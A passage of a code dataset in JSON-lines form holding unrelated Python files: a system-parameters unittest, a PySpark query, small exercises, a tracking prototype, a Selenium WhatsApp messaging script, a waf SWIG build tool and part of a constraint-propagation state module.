THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\nFITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR\nCONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\nOF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n****************************************************************************************************\n\"\"\"\n\nimport os\nimport unittest\n\nfrom geojson_modelica_translator.system_parameters.system_parameters import (\n SystemParameters\n)\n\n\nclass GeoJSONTest(unittest.TestCase):\n def test_load_system_parameters_1(self):\n filename = os.path.abspath(\"tests/system_parameters/data/system_params_1.json\")\n sdp = SystemParameters(filename)\n self.assertEqual(\n sdp.data[\"buildings\"][\"default\"][\"load_model_parameters\"][\"rc\"][\"order\"], 2\n )\n\n def test_load_system_parameters_2(self):\n filename = os.path.abspath(\"tests/system_parameters/data/system_params_2.json\")\n sdp = SystemParameters(filename)\n self.assertIsNotNone(sdp)\n\n def test_missing_file(self):\n fn = \"non-existent-path\"\n with self.assertRaises(Exception) as exc:\n SystemParameters(fn)\n self.assertEqual(\n f\"System design parameters file does not exist: {fn}\", str(exc.exception)\n )\n\n def test_errors(self):\n data = {\n \"buildings\": {\n \"default\": {\n \"load_model\": \"ROM/RC\",\n \"load_model_parameters\": {\"rc\": {\"order\": 6}},\n }\n }\n }\n\n with self.assertRaises(Exception) as exc:\n SystemParameters.loadd(data)\n self.assertRegex(str(exc.exception), \"Invalid system parameter file.*\")\n\n sp = SystemParameters.loadd(data, validate_on_load=False)\n self.assertEqual(sp.validate()[0], \"6 is not one of [1, 2, 3, 4]\")\n\n def test_get_param(self):\n data = {\n \"buildings\": {\n \"default\": {\n \"load_model\": \"ROM/RC\",\n \"load_model_parameters\": {\"rc\": {\"order\": 4}},\n }\n }\n }\n sp = SystemParameters.loadd(data)\n value = sp.get_param(\"buildings.default.load_model_parameters.rc.order\")\n self.assertEqual(value, 4)\n\n value = sp.get_param(\"buildings.default.load_model\")\n self.assertEqual(value, \"ROM/RC\")\n\n value = sp.get_param(\"buildings.default\")\n self.assertDictEqual(\n value,\n {\"load_model\": \"ROM/RC\", \"load_model_parameters\": {\"rc\": {\"order\": 4}}},\n )\n\n value = sp.get_param(\"\")\n self.assertIsNone(value)\n\n value = sp.get_param(\"not.a.real.path\")\n self.assertIsNone(value)\n\n def test_get_param_with_default(self):\n data = {\"buildings\": {\"default\": {\"load_model\": \"Spawn\"}}}\n sp = SystemParameters.loadd(data)\n value = sp.get_param(\n \"buildings.default.load_model_parameters.rc.order\", default=2\n )\n self.assertEqual(value, 2)\n\n value = sp.get_param(\"not.a.real.path\", default=2)\n self.assertEqual(value, 2)\n\n def test_get_param_with_building_id(self):\n filename = os.path.abspath(\"tests/system_parameters/data/system_params_1.json\")\n sdp = SystemParameters(filename)\n\n value = sdp.get_param_by_building_id(\"abcd1234\", \"ets.system\")\n self.assertEqual(value, \"Booster Heater\")\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","sub_path":"tests/system_parameters/test_system_parameters.py","file_name":"test_system_parameters.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"299498532","text":"#!/usr/bin/python2 \n# -*- coding: utf-8 -*-\n\nfrom pyspark import SparkContext \nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import to_date,months_between,current_timestamp,floor\n\n\ndata_enh=\"hdfs://10.190.2.112/data/data_dump.txt\"\ntrain_set=\"hdfs://10.190.2.112/data/train_set.txt\"\nval_set=\"hdfs://10.190.2.112/data/val_set.txt\"\ntest_set=\"hdfs://10.190.2.112/data/test.txt\"\n\n\n# Load the data\nspark = SparkSession.builder.master(\"spark://10.190.2.112:7077\").appName(\"pssql07\").getOrCreate()\ndf = spark.read.csv(data_enh,header=None,encoding=\"utf-8\",inferSchema=True,sep=\"\\t\").drop_duplicates()\n\n\n# Run SQL query 1\ndf1=df.select(df[8].alias(\"birth\"),df[11].alias(\"city\"))\ndf1=df1.withColumn('Tdate',to_date(df1[0], 'dd/MM/yyyy')).withColumn('Cur_time',to_date(current_timestamp(),\"dd/MM/yyyy\")) # str -> date, now()\ndf2=df1.select(\"city\",floor(months_between('Cur_time','Tdate')/12).alias(\"age\")) # take the difference in months divided by 12 as a new column, aliased \"age\"\ndf2.createOrReplaceTempView(\"Tur_db7\")\nq=\"\"\"select city,mean(age) as avg_age\nfrom Tur_db7\ngroup by city\norder by avg_age\n\"\"\"\nspark.sql(q).show(5) # or use limit or rank\n\n\n","sub_path":"N&E local/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179504798","text":"\"\"\"\r\n7. Write a Python script to merge two Python dictionaries.\r\n\"\"\"\r\n\r\n\r\ndef merge_dict(*args):\r\n    new_dict = {}\r\n    for each in args:\r\n        new_dict.update(each)\r\n\r\n    return new_dict\r\n\r\n\r\ndict_1 = {\r\n    'name': \"Sulav\",\r\n    'age': 20,\r\n    'section': 'A',\r\n    'semester': 'First'\r\n}\r\ndict_2 = {\r\n    'Nepal': {'capital': 'Kathmandu', 'Population': 300000000},\r\n    'China': {'capital': 'Beijing', 'Population': 1000000000}\r\n}\r\ndict_3 = {\r\n    1: 1,\r\n    2: 4,\r\n    3: 9,\r\n    4: 16,\r\n    5: 25\r\n}\r\nprint(\"Merging dict_1 and dict_2:\")\r\nprint(merge_dict(dict_1, dict_2))\r\n\r\nprint(\"Merging dict_2 and dict_3:\")\r\nprint(merge_dict(dict_2, dict_3))\r\n\r\nprint(\"Merging dict_1 and dict_3:\")\r\nprint(merge_dict(dict_1, dict_3))\r\n\r\nprint(\"Merging dict_1 and dict_2 and dict_3:\")\r\nprint(merge_dict(dict_1, dict_2, dict_3))","sub_path":"Jan 19/Assignment/Dictionary/Jan19_Dictionary_Qsn07.py","file_name":"Jan19_Dictionary_Qsn07.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"378246120","text":"def mySqrt(n):\n    root = n/2\n    # Newton's method; returns the right answer for 3 after five iterations, and for 10 it takes 7 iterations\n    for i in range(7):\n        newroot = .5 * (root + (n/root))\n        root = newroot\n    return newroot\n    \n    \n\nprint(mySqrt(100))\nprint(mySqrt(9))\n\n\n","sub_path":"Unit1/newtonsSquareRoot.py","file_name":"newtonsSquareRoot.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"236150284","text":"# Placeholder for tracking framework\nimport numpy as np\nfrom collections import defaultdict\nfrom scipy.spatial import distance_matrix, KDTree, distance\nimport lap\n\nlbl_t1 = np.random.randint(20, 2028, size=(1000, 2))\n
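# Synthetic test data: 1000 centroids in frame t1, with frames t2 and t3\n# derived from the previous frame by a random jitter of at most 15 px.\n# Below, frame-to-frame links are built with the LAP solver, then a second\n# LAP pass closes short gaps between track ends and track starts.\n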
lbl_t2 = np.random.randint(-15, 15, size=(1000,2))+lbl_t1\nlbl_t3 = np.random.randint(-15, 15, size=(1000,2))+lbl_t2\n\nmax_displacement = 20\nmax_discontinuity = 3\n\ntimepoints = [1,2,3]\nconsecutive_tp_pairs = [(timepoints[i], timepoints[i+1])\n                        for i in range(len(timepoints)-1)]\nlbls = {1: lbl_t1, 2: lbl_t2, 3: lbl_t3}\ntp2idx = {tp:i for i, tp in enumerate(timepoints)}\ntracks = []\nsegment_list = []\ntrack_id = 1\nfor ti, tj in consecutive_tp_pairs:\n    lbl_i, lbl_j = lbls[ti], lbls[tj] # Assuming these are centroids\n    cost_matrix = distance_matrix(lbl_i, lbl_j)\n    total_cost, column2row, row2column = lap.lapjv(cost_matrix,\n                                                   cost_limit=max_displacement,\n                                                   extend_cost=True)\n    for col, row in enumerate(column2row):\n        if row == -1:  # unmatched detection starts a single-point track\n            tracks.append(([ti], [lbl_i[col]])) # time and xy\n        else:\n            tracks.append(([ti, tj], [lbl_i[col], lbl_j[row]]))\n        track_id += 1\n    \n    \ntrack_starts = np.array([i[0][0] for i in tracks])\ntrack_ends = np.array([i[0][-1] for i in tracks])\n\ntrack_xy_start = np.array([i[1][0] for i in tracks])\ntrack_xy_end = np.array([i[1][-1] for i in tracks])\n\nn = len(tracks)\ncc = [] # Finite costs\nii = [] # indices of rows\nkk = []\ngap_cost_mat = np.ones((n, n))*1000\nfor idx, (tps, xys) in enumerate(tracks):\n    tstart = tps[0]\n    tend = tps[-1]\n    xy_start = xys[0]\n    xy_end = xys[-1]\n    tracks_starting_after_this_ends = np.where((track_starts>=tend) & (track_starts<tend+max_discontinuity))[0]\n    if len(tracks_starting_after_this_ends)>0:\n        start_tree = KDTree(track_xy_start[tracks_starting_after_this_ends])\n        possmerge_start = start_tree.query(xy_end, k=50, distance_upper_bound=max_displacement)\n        for d, tidx in zip(possmerge_start[0], possmerge_start[1]):\n#            if idx == tidx:\n#                continue\n            if d>max_displacement:\n                break\n            else:\n                cc.append(d)\n                ii.append(idx)\n                kk.append(tidx)\n                gap_cost_mat[idx, tracks_starting_after_this_ends[tidx]] = d\n    tracks_ending_before_this_track = np.where((track_ends<=tstart) & (track_ends>tstart-max_discontinuity))[0]\n    if len(tracks_ending_before_this_track)>0:\n        end_tree = KDTree(track_xy_end[tracks_ending_before_this_track])\n        possmerge_end = end_tree.query(xy_start, k=50, distance_upper_bound=max_displacement)\n        for d, tidx in zip(possmerge_end[0], possmerge_end[1]):\n#            if idx == tidx:\n#                continue\n            if d>max_displacement:\n                break\n            else:\n                cc.append(d)\n                ii.append(idx)\n                kk.append(tidx)\n                gap_cost_mat[idx, tracks_ending_before_this_track[tidx]] = d\n\n    \na,b,c = lap.lapjv(gap_cost_mat, cost_limit=max_displacement,\n                  extend_cost=True)\nfor idx, i in enumerate(c):\n    if i == -1:\n        continue\n    track_i = tracks[idx]\n    track_j = tracks[i]\n    if track_i[0][0]>track_j[0][0]:\n        track_j, track_i = track_i, track_j\n    ti_tp = track_i[0]\n    ti_xy = track_i[1]\n    \n    tj_tp = track_j[0]\n    tj_xy = track_j[1]\n    if ti_tp[-1]==tj_tp[0]:\n#    if ti_tp[0]==tj_tp[0]:\n        merged_tps = ti_tp[:-1]+tj_tp\n        merged_xys = ti_xy[:-1]+tj_xy\n    elif ti_tp[-1]<tj_tp[0]:\n        merged_tps = ti_tp+tj_tp\n        merged_xys = ti_xy+tj_xy\n    elif ti_tp[0]>tj_tp[0]:\n        merged_tps = tj_tp+ti_tp\n        merged_xys = tj_xy+ti_xy\n    merged_xys = list(map(tuple, merged_xys))\n    if len(merged_xys)>3:\n        print(track_i, track_j, idx, i)\n    #print(merged_xys)\n    \n    \na,b,c = lap.lapjv(gap_cost_mat, cost_limit=max_displacement,\n                  extend_cost=True)\ntrack_dict = {}\nfor idx, i in enumerate(c):\n    if i == -1:\n        continue\n    track_i = tracks[idx]\n    track_j = tracks[i]\n    if track_i[0][0]>track_j[0][0]:\n        track_j, track_i = track_i, track_j\n    ti_tp = track_i[0]\n    ti_xy = track_i[1]\n    \n    tj_tp = track_j[0]\n    tj_xy = track_j[1]\n    if ti_tp[-1]==tj_tp[0]:\n#    if ti_tp[0]==tj_tp[0]:\n        merged_tps = ti_tp[:-1]+tj_tp\n        merged_xys = ti_xy[:-1]+tj_xy\n    elif ti_tp[-1]<tj_tp[0]:\n        merged_tps = ti_tp+tj_tp\n        merged_xys = ti_xy+tj_xy\n    elif ti_tp[0]>tj_tp[0]:\n        merged_tps = tj_tp+ti_tp\n        merged_xys = 
tj_xy+ti_xy\n merged_xys = tuple(map(tuple, merged_xys))\n if len(merged_xys)>3:\n print(track_i, track_j, idx, i)\n track_dict[merged_xys] = merged_tps\n #print(merged_xys)","sub_path":"tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504696816","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\n# import pandas\nimport time\n\ndef send_to_saved(lst,message):\n # Load the chrome driver\n driver = webdriver.Chrome()\n count = 0\n driver.get(\"https://web.whatsapp.com/\")\n wait = WebDriverWait(driver, 80)\n for number in lst:\n search_box = '//*[@id=\"side\"]/div[1]/div/label/div/div[2]'\n person_title = wait.until(lambda driver:driver.find_element_by_xpath(search_box))\n\n # Clear search box if any contact number is written in it\n person_title.clear()\n\n # Send contact number in search box\n person_title.send_keys(number)\n count = count + 1\n\n # Wait for 2 seconds to search contact number\n time.sleep(2)\n\n try:\n # Load error message in case unavailability of contact number\n element = driver.find_element_by_xpath('//*[@id=\"pane-side\"]/div[1]/div/span')\n except NoSuchElementException:\n # Format the message from excel sheet\n \n person_title.send_keys(Keys.ENTER)\n actions = ActionChains(driver)\n actions.send_keys(message)\n actions.send_keys(Keys.ENTER)\n actions.perform()\n # Close chrome browser\n driver.quit()\n","sub_path":"send/saved_contacts.py","file_name":"saved_contacts.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"255176270","text":"#! 
/usr/bin/env python\n# Petar Forai\n# Thomas Nagy 2008-2010 (ita)\nimport re\n\nfrom waflib import Logs\nfrom waflib import Task\nfrom waflib.Configure import conf\nfrom waflib.TaskGen import after_method\nfrom waflib.TaskGen import extension\nfrom waflib.TaskGen import feature\nfrom waflib.Tools import c_preproc\n\n\"\"\"\ntasks have to be added dynamically:\n- swig interface files may be created at runtime\n- the module name may be unknown in advance\n\"\"\"\n\nSWIG_EXTS = [\".swig\", \".i\"]\n\nre_module = re.compile(r\"%module(?:\\s*\\(.*\\))?\\s+(.+)\", re.M)\n\nre_1 = re.compile(r\"^%module.*?\\s+([\\w]+)\\s*?$\", re.M)\nre_2 = re.compile('[#%]include [<\"](.*)[\">]', re.M)\n\n\nclass swig(Task.Task):\n color = \"BLUE\"\n run_str = (\n \"${SWIG} ${SWIGFLAGS} ${SWIGPATH_ST:INCPATHS} ${SWIGDEF_ST:DEFINES} ${SRC}\"\n )\n ext_out = [\".h\"] # might produce .h files although it is not mandatory\n vars = [\"SWIG_VERSION\", \"SWIGDEPS\"]\n\n def runnable_status(self):\n for t in self.run_after:\n if not t.hasrun:\n return Task.ASK_LATER\n\n if not getattr(self, \"init_outputs\", None):\n self.init_outputs = True\n if not getattr(self, \"module\", None):\n # search the module name\n txt = self.inputs[0].read()\n m = re_module.search(txt)\n if not m:\n raise ValueError(\"could not find the swig module name\")\n self.module = m.group(1)\n\n swig_c(self)\n\n # add the language-specific output files as nodes\n # call funs in the dict swig_langs\n for x in self.env[\"SWIGFLAGS\"]:\n # obtain the language\n x = x[1:]\n try:\n fun = swig_langs[x]\n except KeyError:\n pass\n else:\n fun(self)\n\n return super().runnable_status()\n\n def scan(self):\n \"scan for swig dependencies, climb the .i files\"\n lst_src = []\n\n seen = []\n missing = []\n to_see = [self.inputs[0]]\n\n while to_see:\n node = to_see.pop(0)\n if node in seen:\n continue\n seen.append(node)\n lst_src.append(node)\n\n # read the file\n code = node.read()\n code = c_preproc.re_nl.sub(\"\", code)\n code = c_preproc.re_cpp.sub(c_preproc.repl, code)\n\n # find .i files and project headers\n names = re_2.findall(code)\n for n in names:\n for d in self.generator.includes_nodes + [node.parent]:\n u = d.find_resource(n)\n if u:\n to_see.append(u)\n break\n else:\n missing.append(n)\n return (lst_src, missing)\n\n\n# provide additional language processing\nswig_langs = {}\n\n\ndef swigf(fun):\n swig_langs[fun.__name__.replace(\"swig_\", \"\")] = fun\n return fun\n\n\nswig.swigf = swigf\n\n\ndef swig_c(self):\n ext = \".swigwrap_%d.c\" % self.generator.idx\n flags = self.env[\"SWIGFLAGS\"]\n if \"-c++\" in flags:\n ext += \"xx\"\n out_node = self.inputs[0].parent.find_or_declare(self.module + ext)\n\n if \"-c++\" in flags:\n c_tsk = self.generator.cxx_hook(out_node)\n else:\n c_tsk = self.generator.c_hook(out_node)\n\n c_tsk.set_run_after(self)\n\n # transfer weights from swig task to c task\n if getattr(self, \"weight\", None):\n c_tsk.weight = self.weight\n if getattr(self, \"tree_weight\", None):\n c_tsk.tree_weight = self.tree_weight\n\n try:\n self.more_tasks.append(c_tsk)\n except AttributeError:\n self.more_tasks = [c_tsk]\n\n try:\n ltask = self.generator.link_task\n except AttributeError:\n pass\n else:\n ltask.set_run_after(c_tsk)\n # setting input nodes does not declare the build order\n # because the build already started, but it sets\n # the dependency to enable rebuilds\n ltask.inputs.append(c_tsk.outputs[0])\n\n self.outputs.append(out_node)\n\n if not \"-o\" in self.env[\"SWIGFLAGS\"]:\n self.env.append_value(\"SWIGFLAGS\", 
[\"-o\", self.outputs[0].abspath()])\n\n\n@swigf\ndef swig_python(tsk):\n node = tsk.inputs[0].parent\n if tsk.outdir:\n node = tsk.outdir\n tsk.set_outputs(node.find_or_declare(tsk.module + \".py\"))\n\n\n@swigf\ndef swig_ocaml(tsk):\n node = tsk.inputs[0].parent\n if tsk.outdir:\n node = tsk.outdir\n tsk.set_outputs(node.find_or_declare(tsk.module + \".ml\"))\n tsk.set_outputs(node.find_or_declare(tsk.module + \".mli\"))\n\n\n@extension(*SWIG_EXTS)\ndef i_file(self, node):\n # the task instance\n tsk = self.create_task(\"swig\")\n tsk.set_inputs(node)\n tsk.module = getattr(self, \"swig_module\", None)\n\n flags = self.to_list(getattr(self, \"swig_flags\", []))\n tsk.env.append_value(\"SWIGFLAGS\", flags)\n\n tsk.outdir = None\n if \"-outdir\" in flags:\n outdir = flags[flags.index(\"-outdir\") + 1]\n outdir = tsk.generator.bld.bldnode.make_node(outdir)\n outdir.mkdir()\n tsk.outdir = outdir\n\n\n@feature(\"c\", \"cxx\", \"d\", \"fc\", \"asm\")\n@after_method(\"apply_link\", \"process_source\")\ndef enforce_swig_before_link(self):\n try:\n link_task = self.link_task\n except AttributeError:\n pass\n else:\n for x in self.tasks:\n if x.__class__.__name__ == \"swig\":\n link_task.run_after.add(x)\n\n\n@conf\ndef check_swig_version(conf, minver=None):\n \"\"\"\n Check if the swig tool is found matching a given minimum version.\n minver should be a tuple, eg. to check for swig >= 1.3.28 pass (1,3,28) as minver.\n\n If successful, SWIG_VERSION is defined as 'MAJOR.MINOR'\n (eg. '1.3') of the actual swig version found.\n\n :param minver: minimum version\n :type minver: tuple of int\n :return: swig version\n :rtype: tuple of int\n \"\"\"\n assert minver is None or isinstance(minver, tuple)\n swigbin = conf.env[\"SWIG\"]\n if not swigbin:\n conf.fatal(\"could not find the swig executable\")\n\n # Get swig version string\n cmd = swigbin + [\"-version\"]\n Logs.debug(\"swig: Running swig command %r\", cmd)\n reg_swig = re.compile(r\"SWIG Version\\s(.*)\", re.M)\n swig_out = conf.cmd_and_log(cmd)\n swigver_tuple = tuple([int(s) for s in reg_swig.findall(swig_out)[0].split(\".\")])\n\n # Compare swig version with the minimum required\n result = (minver is None) or (swigver_tuple >= minver)\n\n if result:\n # Define useful environment variables\n swigver = \".\".join([str(x) for x in swigver_tuple[:2]])\n conf.env[\"SWIG_VERSION\"] = swigver\n\n # Feedback\n swigver_full = \".\".join(map(str, swigver_tuple[:3]))\n if minver is None:\n conf.msg(\"Checking for swig version\", swigver_full)\n else:\n minver_str = \".\".join(map(str, minver))\n conf.msg(\n f\"Checking for swig version >= {minver_str}\",\n swigver_full,\n color=result and \"GREEN\" or \"YELLOW\",\n )\n\n if not result:\n conf.fatal(f\"The swig version is too old, expecting {minver!r}\")\n\n return swigver_tuple\n\n\ndef configure(conf):\n conf.find_program(\"swig\", var=\"SWIG\")\n conf.env.SWIGPATH_ST = \"-I%s\"\n conf.env.SWIGDEF_ST = \"-D%s\"\n","sub_path":"docs/.mywaflib/waflib/extras/swig.py","file_name":"swig.py","file_ext":"py","file_size_in_byte":7281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18898522","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport os\nfrom Utilities import FileUtilities\nfrom matplotlib import pyplot as plt\nfrom EarthMovingDistance import EarthMovingDistance\n\ndef main():\n\t'''\n\t\tRetuns after calculating the closest activity\n\t'''\n\tpath = '/Users/Apple/Documents/gitRepo/ra-eeyes-activity-detection/data_input/'\n\tutl = 
\tpath = '/Users/Apple/Documents/gitRepo/ra-eeyes-activity-detection/data_input/'\n\tutl = FileUtilities(path)\n\tamplitude_matrices = utl.get_amplitude_matrices()\n\tprint(\"Number of matrices read = \", len(amplitude_matrices))\n\n\thistograms = []\n\tfor amplitude_matrix in amplitude_matrices:\n\t\tfreq = np.zeros(40)  # one histogram per matrix, accumulated over all rows\n\t\tfor i in amplitude_matrix:\n\t\t\tfor j in i:\n\t\t\t\tfreq[int(j)] += 1\n\t\thistograms.append(freq)\n\n\tlabels_np = np.array(utl.labels)\n\tprint(utl.labels)\n\temd = EarthMovingDistance(histograms)\n\temd_matrix = emd.get_EMD_matrix()\n\tclosest_activity = emd.get_closest_activity()\n\tpredicted = labels_np[closest_activity]\n\tprint(\"______________________ EMD matrix start ______________________\")\n\tprint(emd_matrix)\n\tprint(\"______________________ EMD matrix ends _______________________\")\n\tprint(\"___________________ closest_activity start ___________________\")\n\tprint(predicted)\n\tprint(\"___________________ closest_activity ends ____________________\")\n\nif __name__ == '__main__':\n\tmain()","sub_path":"InPlace.py","file_name":"InPlace.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"626416099","text":"\"\"\"\nThis module provides a State class responsible for thread-specific propagation.\n\"\"\"\n\nfrom abc import abstractmethod\nfrom collections import OrderedDict\nfrom itertools import chain\nfrom .util import lerp, remove_if, TodoList, SortedDict, measure_time_decorator, ABC\nfrom .base import TRUE_LIT, ThreadStatistics\n\n\nclass AbstractConstraint(ABC):\n    \"\"\"\n    Base class of all constraints.\n    \"\"\"\n\n    @abstractmethod\n    def create_state(self):\n        \"\"\"\n        Create thread specific state for the constraint.\n        \"\"\"\n\n\nclass AbstractConstraintState(ABC):\n    \"\"\"\n    Abstract class to capture the state of constraints.\n    \"\"\"\n    def __init__(self):\n        self.inactive_level = 0\n\n    @abstractmethod\n    def attach(self, state):\n        \"\"\"\n        Attach the constraint to the state.\n        \"\"\"\n\n    @abstractmethod\n    def detach(self, state):\n        \"\"\"\n        Detach the constraint from the state.\n        \"\"\"\n\n    @abstractmethod\n    def translate(self, cc, state, config, added):\n        \"\"\"\n        Translate a constraint to simpler constraints.\n        \"\"\"\n\n    @abstractmethod\n    def update(self, i, diff):\n        \"\"\"\n        Inform the state about updated bounds of a variable.\n\n        Value i depends on the value passed when registering the watch and diff\n        is the change to the bound of the watched variable.\n        \"\"\"\n\n    @abstractmethod\n    def undo(self, i, diff):\n        \"\"\"\n        Similar to update but when the bound of a variable is backtracked.\n        \"\"\"\n\n    @abstractmethod\n    def propagate(self, state, cc, config, check_state):\n        \"\"\"\n        Propagates the constraint.\n        \"\"\"\n\n    @abstractmethod\n    def check_full(self, state):\n        \"\"\"\n        Check if the state meets the state invariants.\n        \"\"\"\n\n    @property\n    def marked_inactive(self):\n        \"\"\"\n        Returns true if the constraint is marked inactive.\n        \"\"\"\n        return self.inactive_level > 0\n\n    @marked_inactive.setter\n    def marked_inactive(self, level):\n        \"\"\"\n        Mark a constraint as inactive on the given level.\n        \"\"\"\n        assert not self.marked_inactive\n        self.inactive_level = level+1\n\n    def mark_active(self):\n        \"\"\"\n        Mark a constraint as active.\n        \"\"\"\n        self.inactive_level = 0\n\n    def removable(self, level):\n        \"\"\"\n        A constraint is removable if it has been marked inactive on a lower\n        level.\n        \"\"\"\n        return self.marked_inactive and self.inactive_level <= level\n\n\nclass VarState(object):\n    \"\"\"\n    Class to facilitate handling order 
literals associated with an integer\n variable.\n\n The class maintains a stack of lower and upper bounds, which initially\n contain the smallest and largest allowed integer. These stacks must always\n contain at least one value.\n\n Members\n =======\n var -- The name of the integer variable.\n \"\"\"\n def __init__(self, var, min_int, max_int):\n \"\"\"\n Create an initial state for the given variable.\n\n Initially, the state has a lower bound of `config.min_int` and an upper bound\n of `config.max_int` and is associated with no variables.\n \"\"\"\n self.var = var\n self._upper_bound = [max_int]\n self._lower_bound = [min_int]\n self._literals = SortedDict()\n\n def push_lower(self):\n \"\"\"\n Grows the stack of lower bounds by one copying the top value.\n \"\"\"\n self._lower_bound.append(self.lower_bound)\n\n def push_upper(self):\n \"\"\"\n Grows the stack of upper bounds by one copying the top value.\n \"\"\"\n self._upper_bound.append(self.upper_bound)\n\n def pop_lower(self):\n \"\"\"\n Remove one item from the stack of lower bounds.\n\n Must be called on a stack of size greater than one.\n \"\"\"\n assert len(self._lower_bound) > 1\n self._lower_bound.pop()\n\n def pop_upper(self):\n \"\"\"\n Remove one item from the stack of upper bounds.\n\n Must be called on a stack of size greater than one.\n \"\"\"\n assert len(self._upper_bound) > 1\n self._upper_bound.pop()\n\n @property\n def lower_bound(self):\n \"\"\"\n Get the current lower bound on top of the stack.\n \"\"\"\n assert self._lower_bound\n return self._lower_bound[-1]\n\n @lower_bound.setter\n def lower_bound(self, value):\n \"\"\"\n Set the current lower bound on top of the stack.\n\n Must not be called on an empty stack.\n \"\"\"\n assert self._lower_bound\n self._lower_bound[-1] = value\n\n @property\n def min_bound(self):\n \"\"\"\n Get the smallest lower bound of the state.\n \"\"\"\n assert self._lower_bound\n return self._lower_bound[0]\n\n @property\n def upper_bound(self):\n \"\"\"\n Get the current upper bound on top of the stack.\n\n Must not be called on an empty stack.\n \"\"\"\n assert self._upper_bound\n return self._upper_bound[-1]\n\n @upper_bound.setter\n def upper_bound(self, value):\n \"\"\"\n Set the current upper bound on top of the stack.\n\n Must not be called on an empty stack.\n \"\"\"\n assert self._upper_bound\n self._upper_bound[-1] = value\n\n @property\n def max_bound(self):\n \"\"\"\n Get the largest upper bound of the state.\n \"\"\"\n assert self._upper_bound\n return self._upper_bound[0]\n\n @property\n def is_assigned(self):\n \"\"\"\n Determine if the variable is assigned, i.e., the current lower bound\n equals the current upper bound.\n \"\"\"\n return self.upper_bound == self.lower_bound\n\n def has_literal(self, value):\n \"\"\"\n Determine if the given `value` is associated with an order literal.\n \"\"\"\n return value in self._literals\n\n def get_literal(self, value):\n \"\"\"\n Get the literal associated with the given `value`.\n\n The value must be associated with a literal.\n \"\"\"\n return self._literals[value]\n\n def prev_values(self, value):\n \"\"\"\n Get the the preceeding value/literal pairs of the given value in\n descending order.\n\n The value must be associated with a literal.\n \"\"\"\n assert self.has_literal(value)\n i = self._literals.bisect_left(value)\n while i > 0:\n yield self._literals.peekitem(i-1)\n i -= 1\n\n def succ_values(self, value):\n \"\"\"\n Get the the succeeding value/literal pairs of the given value in\n ascending order.\n\n The value 
must be associated with a literal.\n \"\"\"\n assert self.has_literal(value)\n i = self._literals.bisect_right(value)\n while i < len(self._literals):\n yield self._literals.peekitem(i)\n i += 1\n\n def value_le(self, value):\n \"\"\"\n Find a value less than or equal to value.\n \"\"\"\n i = self._literals.bisect_right(value)\n return self._literals.peekitem(i-1) if i > 0 else None\n\n def value_ge(self, value):\n \"\"\"\n Find a value greater than or equal to value.\n \"\"\"\n i = self._literals.bisect_left(value)\n return self._literals.peekitem(i) if i < len(self._literals) else None\n\n def set_literal(self, value, lit):\n \"\"\"\n Set the literal of the given `value`.\n \"\"\"\n self._literals[value] = lit\n\n def unset_literal(self, value):\n \"\"\"\n Unset the literal of the given `value`.\n \"\"\"\n del self._literals[value]\n\n def reset(self, min_int, max_int):\n \"\"\"\n Remove all literals associated with this state.\n \"\"\"\n self._upper_bound = [max_int]\n self._lower_bound = [min_int]\n self._literals.clear()\n\n def __repr__(self):\n return \"{}=[{},{}]\".format(self.var, self.lower_bound, self.upper_bound)\n\n\nclass Level(object):\n \"\"\"\n Simple class that captures state local to a decision level.\n\n Members\n =======\n level -- The decision level.\n undo_upper -- Set of `VarState` objects that have been assigned an upper\n bound.\n undo_lower -- Set of `VarState` objects that have been assigned a lower\n bound.\n inactive -- List of constraints that are inactive on the next level.\n removed_v2cs -- List of variable/coefficient/constraint triples that have\n been removed from the State._v2cs map.\n \"\"\"\n def __init__(self, level):\n \"\"\"\n Construct an empty state for the given decision `level`.\n \"\"\"\n self.level = level\n self.inactive = []\n self.removed_v2cs = []\n # Note: A trail-like data structure would also be possible but then\n # assignments would have to be undone.\n self.undo_upper = TodoList()\n self.undo_lower = TodoList()\n\n def copy_state(self, state, lvl):\n \"\"\"\n Copy level from given state.\n \"\"\"\n assert self.level == lvl.level\n\n self.undo_lower.clear()\n for vs in lvl.undo_lower:\n self.undo_lower.add(state.var_state(vs.var))\n\n self.undo_upper.clear()\n for vs in lvl.undo_upper:\n self.undo_upper.add(state.var_state(vs.var))\n\n del self.inactive[:]\n for cs in lvl.inactive:\n self.inactive.append(state.constraint_state(cs.constraint))\n\n del 